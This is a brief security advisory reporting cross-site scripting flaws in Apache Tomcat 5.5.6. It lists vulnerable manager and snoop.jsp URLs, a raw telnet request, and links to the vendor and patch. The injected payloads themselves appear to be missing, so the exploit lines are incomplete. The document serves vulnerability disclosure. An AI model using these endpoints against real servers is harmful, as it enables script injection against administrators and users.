Apache Jakarta Tomcat Cross Site Scripting Vulnerabilities =========================================================== Version ======== Apache Tomcat/5.5.6 running on Windows 2000 (Other platforms may also be affected) Exploiting =========== http://192.168.0.23:8080/manager/html/ http://192.168.0.23:8080/manager/html/stop?path= http://192.168.0.23:8080/manager/html/start?path= Second one works without authentication, but should not be that easy to exploit: Telnet to port 8080 and paste the following: /jsp-examples/snp/snoop.jsp HTTP/1.0 Vendor ====== http://jakarta.apache.org Patch ===== http://www.mail-archive.com/tomcat-dev@jakarta.apache.org/msg66978.html Discovered ========== 03.Jan.2005 oliver karow http://www.oliverkarow.de/research/jakarta556_xss.txt